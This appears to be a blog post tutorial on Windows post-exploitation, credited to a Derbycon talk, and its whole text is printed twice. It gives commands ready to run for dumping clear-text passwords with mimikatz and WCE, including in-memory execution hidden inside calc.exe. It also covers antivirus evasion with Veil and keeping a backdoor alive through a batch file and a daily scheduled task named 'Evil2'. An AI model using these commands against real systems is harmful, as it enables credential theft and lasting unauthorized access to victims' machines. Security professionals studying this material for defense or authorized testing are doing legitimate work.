Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.
First create one batch file , put following code in it
@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.
Get clear text password:-
Following are different methods to get clear text password of windows.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
So till now i upload one batch file ; backdoor & get clear text password.
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00
It will ask to enter password which we got before.
You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.
First create one batch file , put following code in it
@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.
Get clear text password:-
Following are different methods to get clear text password of windows.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
So till now i upload one batch file ; backdoor & get clear text password.
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00
It will ask to enter password which we got before.
You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.
 
 
 
 
No comments:
Post a Comment